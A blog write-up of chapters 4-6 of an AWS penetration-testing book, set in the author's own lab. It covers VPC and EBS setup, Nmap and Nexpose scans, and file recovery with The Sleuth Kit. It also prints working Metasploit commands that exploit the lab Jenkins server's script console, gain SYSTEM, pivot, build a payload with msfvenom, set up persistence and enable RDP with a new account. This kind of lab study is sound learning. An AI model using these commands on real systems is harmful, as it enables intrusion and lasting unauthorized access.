Book info – Hands-On AWS Penetration Testing with Kali Linux
Disclaimer: Working through this book uses AWS, which costs money, so make sure you manage your spending. If I remember, I’ll keep up with my costs to give a general idea, but prices can change at any time, so take mine with a major grain of salt.
Disclaimer #2: Jail is bad. Cybercrime is illegal. Educational purposes. IANAL. Don’t do things you shouldn’t. Etc.
Ch 4 – Setting Up Your First EC2 Instances
First thoughts…didn’t we just set up EC2 instances? I think the point is we’re about to start customizing things. I am curious if I need to keep the existing EC2 instances or if they can be terminated.
Search the AWS Marketplace for Ubuntu, pick the latest available AMI, pick the free tier, then configure VPC and Subnet. Fun!
- Click “Create new VPC”
- Click “Create VPC” – give it a name and an IPv4 CIDR block (10.0.0.0/16 for the book)
- Click “Create”
Now create a subnet…
- Click “Subnets” in the left menu frame (you should still be in the VPC dashboard)
- Give it a name, pick the new VPC
- Pick the CIDR block (10.0.1.0/24 for the book)
- Pick the option to auto-assign a public IPv4
- Click “Create”
Go back to the “Launch instance wizard” (probably in another tab) and refresh the Network option. Pick the new VPC and it should auto-select the subnet. That part goes smoothly, but (hat tip to Jetson23) you have to attach an Internet Gateway to the VPC – and add a route to it in the subnet’s route table – if you actually want to reach the instance. At least that is how it worked for me and how it reads in the AWS VPC docs. It’s not that complicated, but it could leave you chasing your tail trying to connect. My instance came up in the new VPC and subnet with IPv4 auto-assignment enabled but wouldn’t connect until I added the IGW – then connecting was no problem.
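The console clicks above boil down to a few AWS CLI calls. This is just a sketch to show where the IGW fits – the igw-/vpc-/rtb- IDs are placeholders, not values from the book:

```shell
# Sketch only – resource IDs are placeholders
aws ec2 create-internet-gateway                  # note the igw-... ID it returns
aws ec2 attach-internet-gateway --internet-gateway-id igw-PLACEHOLDER --vpc-id vpc-PLACEHOLDER
# The subnet's route table also needs a default route pointing at the IGW
aws ec2 create-route --route-table-id rtb-PLACEHOLDER \
    --destination-cidr-block 0.0.0.0/0 --gateway-id igw-PLACEHOLDER
```

Without that last route, the instance sits in the VPC with a public IP assigned but nothing routes its traffic to the internet, which matches the symptom I hit.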
Add more storage – recommended is EBS, 40 GB, general purpose (gp2), with delete on termination selected. That seems like a really big volume to add for a lab. The gp2 blocks are currently $0.10 (US) per GB per month. So with 8 GB for each of the Ubuntu (16) instances, 25 GB for Kali, and 30 GB for Windows, our root storage will run about $7.00 a month. Not a huge number, but I can see how it could easily climb. I don’t see a good reason to add 40 GB…ok, reading on, it looks like the whole point of this is practice. So I skipped it. I had some concerns about whether the previously created instances needed to be on the new VPC, but I determined that wasn’t necessary.
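To sanity-check that monthly number, here’s the arithmetic as a quick shell sketch (the $0.10/GB-month gp2 price and the 8/8/25/30 GB volume sizes are the figures from my setup, and both will vary by region and date):

```shell
# gp2 root volumes: two 8 GB Ubuntu, 25 GB Kali, 30 GB Windows
total_gb=$((8 + 8 + 25 + 30))
# $0.10 per GB-month, computed in cents to stay in integer math
cost_cents=$((total_gb * 10))
printf '%d GB at $0.10/GB-month is $%d.%02d per month\n' \
    "$total_gb" $((cost_cents / 100)) $((cost_cents % 100))
# prints: 71 GB at $0.10/GB-month is $7.10 per month
```

Adding the suggested 40 GB volume would tack on another $4.00 a month at that rate, which is why I skipped it.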
There was some good background info about AWS in this chapter, so that was helpful. Otherwise, it was kind of a repeat of setting up instances. The VPC and subnet customization had some hiccups. Not sure if AWS changed the workflow between the time of writing and now, but the AWS documentation is decent, so it wasn’t too much of a problem. I am doing the AWS Cloud Practitioner Essentials free course and had just watched the AWS Core Services module, so that may have made it less confusing. Checking out the available AWS training might be beneficial.
Ch 5 – Penetration Testing of EC2 Instances using Kali Linux
Reading this chapter initially had me side-eyeing things because it talked about installing Jenkins on a Linux VM, then talked about installing it on a Windows 2008 box. What actually happens is Jenkins runs on the Windows instance, and then there is an Ubuntu instance that is only accessible via the Jenkins machine (and SSH, because you do want to make sure you can access it if necessary).
Installing Jenkins on Windows
Back to the Windows 2008 instance created in section 1. (I did terminate the Ubuntu instance I made earlier so I can make a new one later in this section – no real reason other than I can.) Download Jenkins, extract, install. Set up the user and start the service. Browse to the instance’s private IP and you should be taken to a login page once you finish.
The book says to verify access from Kali by creating an SSH tunnel to the Kali machine with PuTTY. I guess that means PuTTY from the 2008 instance to Kali with port forwarding on 8080. I didn’t think that was necessary, so I just got into RDP using Guacamole and verified I could browse to the Jenkins login page.
Setting up a target VM behind Jenkins
Spin up a new Ubuntu 18.04 instance – if you are making a new one, be sure to pick the same region, VPC, and subnet you’ve been using. Adjust your security rules to allow access via SSH, just in case you need it, and to allow all traffic from the Windows Jenkins machine. The book says to do so using the security group ID. That works well enough.
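The group-ID rule the book describes would look something like this from the CLI (a sketch only; sg-UBUNTU and sg-JENKINS are placeholder IDs for the target’s and the Windows machine’s security groups):

```shell
# Sketch only – allow everything, but only from members of the Jenkins box's group
aws ec2 authorize-security-group-ingress \
    --group-id sg-UBUNTU \
    --protocol -1 \
    --source-group sg-JENKINS
```

Referencing the group instead of an IP means the rule keeps working even if the Windows instance’s private IP changes.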
Setting up Nexpose
This was a pain. Nexpose is now InsightVM (still Rapid7). You need a company email, which just really irritates me. Don’t get me wrong – I like a lot of what Rapid7 does and think they have some pretty good stuff. Just bothers me that to test the product you have to essentially be worth calling. I understand the purpose, and I can’t really disagree with it. But I’m a fan of getting at least some version of your tool in people’s hands so they decide it’s worth using. I’m not sure if this was the case when the book was written, but I like to see things like this mentioned.
But I digress…
Jump through hoops, download, install. Make sure to chmod the file so it can execute, and be logged in as root to run it. An important note: add the -c option at the end of the install command.
chmod +x Rapid7Setup-Linux64.bin
./Rapid7Setup-Linux64.bin -c
My Nexpose wasn’t running, so I uninstalled. I went to reinstall and it errored out because of a lack of space. I’m wondering if trying to run Nexpose was consuming all my resources.
Create volume (I picked 100 GB so I would have more than the recommended 80 GB), attach, format.
lsblk
file -s /dev/xvdf
mkfs -t ext4 /dev/xvdf
mkdir /<nameofstorage>
mount /dev/xvdf /<nameofstorage>/
Nexpose also recommends a minimum of 8 GB RAM, so it looks like I’ll be installing, then shutting the instance down to add some resources. Based on how my Kali instance was acting, I think the demands were overrunning the compute power. I bumped it up to a t2.large to test since that (almost) has the recommended RAM. With the t2.large, I was able to get running.
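Resizing is just stop, modify, start. If you’d rather do it from the CLI than the console, it looks roughly like this (the instance ID is a placeholder, and the instance must be fully stopped before the type change is accepted):

```shell
# Sketch only – i-PLACEHOLDER is your instance ID
aws ec2 stop-instances --instance-ids i-PLACEHOLDER
aws ec2 wait instance-stopped --instance-ids i-PLACEHOLDER
aws ec2 modify-instance-attribute --instance-id i-PLACEHOLDER --instance-type Value=t2.large
aws ec2 start-instances --instance-ids i-PLACEHOLDER
```

Just remember a t2.large bills at a noticeably higher hourly rate than a t2.medium, so size back down when you’re done testing.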
I’m pretty comfortable with Nmap, at least for basic recon. I stepped through the scans because it doesn’t hurt to do so. Plus I needed to let Nexpose initialize…
sudo nmap -sn 172.31.0.0/20  #Decided this was going to take too long and switched to
sudo nmap -sn 172.31.32.0/24  #because that's where my stuff was
sudo nmap <WindowsPrivateIP>  #Basic scan
sudo nmap -T4 -p- <WindowsPrivateIP>  #Scan all the ports
sudo nmap -v -p <port_list_comma_separated> -sV <WindowsPrivateIP>  #Get port services
Basically, Nexpose is like Nmap on steroids – host discovery, port scanning, service discovery, OS fingerprinting, vulnerability checks, brute-force attacks (careful with that one), policy checks, and reports. I haven’t worked with Nexpose before, so this part was interesting. Lots of scan options, including one for CIS. Poking around the dashboard, I can see some possibilities for the product.
I was able to run Nmap and Nexpose at the same time without overloading my instance, so that’s a good sign. Hopefully I’ll have time to work with Nexpose a bit more during the trial period. I was hoping we’d come back to it later in the book, but it doesn’t look like it. (Having the Kindle version comes in handy sometimes.) I think you could skip the Nexpose install if you aren’t interested in it. It kind of seems like a waste of a trial to just scan one thing.
Exploit Jenkins with Metasploit
For the most part, this was just follow along with the book. The only difficulty I ran into was that the reverse_tcp payload didn’t work. There are a ton of payloads, and since the next part used meterpreter, I wanted to stick with a meterpreter payload. I gave bind_tcp a shot and it worked. I was able to get root/admin on the Windows server and access the Ubuntu instance.
msfconsole
search jenkins
use exploit/multi/http/jenkins_script_console
set RHOSTS <WindowsIP>
set RPORT 8080
set USERNAME admin
set PASSWORD admin
set TARGETURI /
set target 0  #To indicate Windows
show payloads  #Optional
set payload windows/x64/meterpreter/reverse_tcp  #Didn't work for me
set payload windows/x64/meterpreter/bind_tcp  #Worked for me
set LHOST <KaliIP>  #Book accidentally calls this LPORT
run
If all goes well, you’ll have a meterpreter shell. When I used the reverse_tcp payload, the exploit executed, but I didn’t get a shell. Switching to bind_tcp got me a meterpreter shell. Then on to digging around on the Windows machine…
sysinfo  #Check out the system information
getsystem  #Get admin on Windows systems, fantastic Metasploit feature
getuid  #Confirm admin
background
route add <targetIP> <subnetmask> <meterpreter_session>
use auxiliary/scanner/portscan/tcp
set RHOSTS <UbuntuIP>
run
Hopefully you’ll see port 22 for SSH and a few others. The auxiliary scanner took a good amount of time. Like forever. Scanning 10,000 ports in a single thread is going to take time, though. And since I always forget how to bring a session back up, here’s the SANS Metasploit Cheat Sheet.
background  #Sends a session to the background, will tell you the session ID in the response
Backgrounding session 1...  #Result of background
sessions -l  #List all background sessions
sessions -i <ID>  #Back to the session
The route addition shown in the book is a little unclear. I wasn’t sure what was meant by the target IP. Another good resource for msfconsole commands is from Offensive Security. Based on this, I modified the route command:
route add 172.31.32.0/20 1
And still got nothing but 22. I logged into my Ubuntu box – and found out nothing was running except 22/ssh, so no wonder I wasn’t getting anything. I did a quick install of vsftpd and verified I could get there.
Moving on to persistence…I stuck with bind_tcp since it worked for me. In an actual pen test, I wouldn’t use 4444 since that’s the Metasploit default, but it’s fine for these purposes.
msfvenom -p windows/x64/meterpreter/bind_tcp LHOST=<KaliIP> LPORT=4444 -f exe -o /tmp/evil.exe  #All one line
sessions -i <sessionID>
run post/windows/manage/persistence_exe REXEPATH=/tmp/evil.exe REXENAME=default.exe STARTUP=USER LocalExePath=C:\\tmp
reboot
exit  #To exit meterpreter session
Prep for the incoming connection after reboot:
use multi/handler
set PAYLOAD windows/x64/meterpreter/bind_tcp
set RHOST <WindowsIP>  #For a bind payload the handler connects out to the target, so this is the Windows box, not Kali
set LPORT 4444
run
Wait for the check-in…and hopefully all is good. I got an error when I tried to reboot – using reboot and shutdown was hit and miss within meterpreter. My check-in never came. I checked the Windows box, and the file was there but not the registry key. So, time to get a little creative…
I adjusted the execution of the exploit to use STARTUP=SYSTEM instead of USER since, looking at the options, SYSTEM looked like a better fit for this situation. Looking at pentestlab’s blog gave me this idea and a few others to try. Lots of playing around with this, and while I was able to get the file installed and the registry keys created, I wasn’t getting the check-in.
I tried this part using reverse_tcp to reduce differences from the book, but while I found the file and the registry key, no luck on the check-in. I RDP-ed into the Windows box and did see an error that default.exe stopped working, so I think it tried to check in, but the reverse_tcp option wasn’t working. So I tried bind_tcp instead. I still had my RDP session up, and no reboot. I rebooted manually to test the persistence…default.exe got another error and no check-in.
I did some more searching and testing because I wanted a way to get persistent access that didn’t rely on the Jenkins exploit. I found an article on Hacking Articles – Raj Chandel’s Blog with a bunch of ways to get persistence on Windows 10. Since this site usually has good info, I started working through the options. I wasn’t having much luck. The RDP exploit looked interesting…and since nothing else had worked, why not? The suggested method did not work – it errored out with a note that Meterpreter scripts are deprecated (try post/windows/manage/enable_rdp) and with insufficient privileges.
So I used getsystem to deal with the privilege issue and then tried the post/windows/manage/enable_rdp option. I basically repeated the module until I got it to accept my options. My password was too weak, then it was too long, then it didn’t like the username, but finally I got it to go through.
use post/windows/manage/enable_rdp
set ENABLE true  #Didn't change
set FORWARD false  #Didn't change
set LPORT 3389  #Didn't change
set PASSWORD <password>  #Trial and error until you get something accepted
set SESSION <sessionID>
set USERNAME <username>  #Trial and error until you get something accepted
run  #Repeat until the options are accepted
I’m curious whether part of the difficulties I was having related to using a CIS-issued AMI. Really, why did I have to pick an image that was hardened? More fun than something that is wide open, I guess.
This was a bit of a frustrating chapter. Some of it felt superfluous, though the info is good. I wish labs would go smoothly, but they rarely do unless you are working in a pre-built environment (which is why I really like being able to do labs in things like Learn on Demand or Practice Labs). It’s hard to say if the changes to Nexpose/InsightVM came before or after the authors wrote the book. Plus, I know when you are writing out labs, you may be using an existing environment and not really notice which version of something you are using. I’m curious to hear if others are able to run Nexpose on a t2.medium. I might have been able to fight with it more and get it to work, but in the interest of time, I’m good with upping the size and adding an Elastic Block Store. It did seem to blip the first time I installed, but after blowing away the initial EBS and creating a new one, I was able to get through the Nexpose part. The Jenkins exploit and pivoting went well except for persistence. But it was good to look at some other options for persistence.
Ch 6 – Elastic Block Stores and Snapshots – Retrieving Deleted Data
I was excited about the lab for this chapter. I’ve been wanting to get more experience with digital forensics, so yay. Lots of background on EBS. Some repetitive, but not a big deal. Good info on digital forensics and intro to how/why this works. And then the wheels fell off.
Create a small EBS, attach it to Ubuntu, SSH in, format, make a file, delete the file, unmount, and detach at the EC2 level.
lsblk
sudo file -s /dev/<partitionID>  #Check for existing data
sudo mkfs -t ext4 /dev/<partitionID>  #Format
sudo mkdir /<directoryformount>
sudo mount /dev/<partitionID> /<directoryformount>
cd /<directoryformount>
df -h .  #Check size
sudo touch data.txt
sudo chmod 666 data.txt
echo "Hello World" > data.txt
sudo rm -rf data.txt  #Delete
cd /  #Get out of the partition
sudo umount -d /dev/<partitionID>  #Unmount
Attach to Kali and get to work…and that didn’t go according to plan. I was able to see the inode for the deleted file using fls, but no results came through on the recovery:
sudo lsblk  #ID partition
sudo mmls /dev/<partitionID>  #Check filesystem - did not find type
sudo fls -o <OFFSET> /dev/<partitionID>  #Use start sector address to list files
sudo fls -o <OFFSET> /dev/<partitionID> <inode_of_file>  #Get inode?
sudo icat -o <OFFSET> /dev/<partitionID> <inode_of_file> > /tmp/data  #Recover
cat /tmp/data  #Theoretically shows file
Since that didn’t work, I went digging. Going through the TSK wiki on file recovery, I was at least able to get more data on the partition. The mmls command returned “unable to determine filesystem”. Using fsstat gave all kinds of information. I was able to get the list of files using fls with no issue. I messed around quite a bit and still could not get anything recovered. So I decided to delete that block and try again. At least I got more familiar with the tools available in TSK.
Made another EBS, attach, format, mount, create, delete, unmount, detach, attach to Kali. And tried another recovery method…
blkls /dev/<partitionid> > /filepath/<name>.blkls  #This will take some time
strings -t d /filepath/<name>.blkls > /filepath/<name>.blkls.str  #Pull all the strings, also going to take a bit
grep "Hello" /filepath/<name>.blkls.str | less  #Search for the string you're after
Well, that at least returned something…a byte offset and the desired string (“Hello World”). That was what I wanted to see. I went ahead and did a few other parts of the walkthrough to see what I could see.
fsstat -t ufs /dev/<partitionid>  #To figure out the fragment size
dd if=/dev/<partitionid> bs=<blocksize> skip=<numberfromgrep/blocksize> count=1 | less  #That gave me a lot of ^ and @
blkcalc -u <numberfromgrep/blocksize> /dev/<partitionid>  #Returns the fragment
blkcat /dev/<partitionid> <fragment> | less  #That gave me Hello World plus a lot of ^ and @
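The <numberfromgrep/blocksize> bit above is just integer division: strings -t d reports a byte offset into the blkls image, and dividing by the filesystem block size gives the block (fragment) address to feed to dd or blkcalc. A quick sketch with made-up numbers (the 1049600 offset and 4096 block size are illustrative, not from my run):

```shell
# strings -t d printed the match at byte offset 1049600 (illustrative value)
offset=1049600
blocksize=4096        # block size reported by fsstat (illustrative value)
block=$((offset / blocksize))   # shell arithmetic truncates, which is what we want
echo "feed block $block to dd/blkcalc"   # prints: feed block 256 to dd/blkcalc
```

The truncation matters: the string almost never starts exactly on a block boundary, so you round down to the containing block.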
That part would have helped find information had I not been looking for something specific. I think with this approach you could step through re-creating files. That will have to wait for a more forensics focused lab though.
I decided to give Autopsy a quick try…because why not? Using our previously set-up Guacamole tunnel, I popped up an RDP session and started Autopsy. Clicking through the basic setup, I could once again see the file but not the contents. Taking what I had learned using the CLI, I was able to go to the Data Unit analysis option, use the fragment number I found from grep, use the “Unallocated (blkls)” Address Type, and display “Hello World”. I poked around the various options in Autopsy just to see what I could see. Interestingly, the inode allocation list showed inode 12 as free, so that may be why the issues with icat were happening. I had some stability issues in Guacamole, so keeping the large instance size might be a good idea if you want to use RDP via Guacamole much. Or add a tunnel for Autopsy to make your life easier – that’s the route I would go if I wanted to do more investigating.
From this older post, it looks like ext3 and ext4 clear inode information differently than ext2, and that may be why icat wasn’t sufficient to recover the file while going directly to the block did work (the pointers between the inode and its blocks get zeroed out). The ext4magic package in Ubuntu looks like an interesting option and has info about why recovery on ext3/4 is not an easy process. But it’s not a default package on Kali, and I think I’ve (almost) chased enough rabbits for this section. So I’m filing that away and moving on. After I pop up an EBS with ext2 to see if everything works more easily. Because reasons.
With ext2, still no icat result. I’m not sure where the disconnect was between what I was finding and the book’s instructions. When the file had not been deleted, using the inode and icat worked wonderfully. But that’s not particularly helpful. More digging, because I’m stubbornly determined to get icat to work. And I found a walkthrough that, based on what I’ve learned so far, makes sense and might work.
sudo fsstat /dev/<partitionID> | less  #To pull details and block size
sudo dd if=/dev/<partitionID> of=/filepath/<partitionID>.img.dd bs=4096  #Create an image
sudo img_stat /filepath/<partitionID>.img.dd
sudo mmls <partitionID>.img.dd  #Still undetermined, b/c this doesn't do ext
sudo fls <partitionID>.img.dd  #Got the same inode number I have been
sudo istat <partitionID>.img.dd <inodeNumber>  #Details, lists the inode as 'Not Allocated'
sudo icat -o <offset> -r <partitionID>.img.dd <inodeNumber> > /tmp/data.txt
And more not working. Looking at this presentation from a SANS summit, it looks like my setup is showing the file size as 0 rather than non-zero when I check it with ils. That seems to be why I’m not able to recover the files using these methods. I thought it might have something to do with switching the EBS between instances, but even deleting the file while mounted to Kali resulted in a file size of 0. I’m wondering if something in ext2 or mkfs was updated so that deleting a file in an ext2 filesystem zeroes out the records. At this point, I’m willing to move on. I learned a lot (though a drop in the bucket in the overall scope) about digital forensics and file systems. It looks like file recovery might be easier on some other filesystem types, so at some point I’ll probably add an EBS to the Win 2008 instance and try to recover deleted files from that.
I’m definitely comfortable creating, attaching, detaching, and deleting Elastic Block Stores now. Nexpose/InsightVM looks pretty cool. Hopefully I’ll get some time to test it out some more before the trial expires. The recovery lab was way more complicated than it should have been for some reason. Lab costs for this section were less than $4.00 (US). Since I bumped up to a t2.large for a bit and added a 100 GB EBS for Nexpose, my costs spiked a bit. Plus all the EBS volumes I created for short stints and deleted. I’ll leave the 100 GB EBS while I have Nexpose, but more than likely I’ll drop it afterwards to reduce costs, since there’s no good reason to keep it. I want to keep looking into The Sleuth Kit and digital forensics. I’m also very curious to see if others run into similar issues with the Jenkins exploit and file recovery. I can think of multiple variables to test with each, but for now, I need to focus on moving forward in the book and doing the other things that need to get done.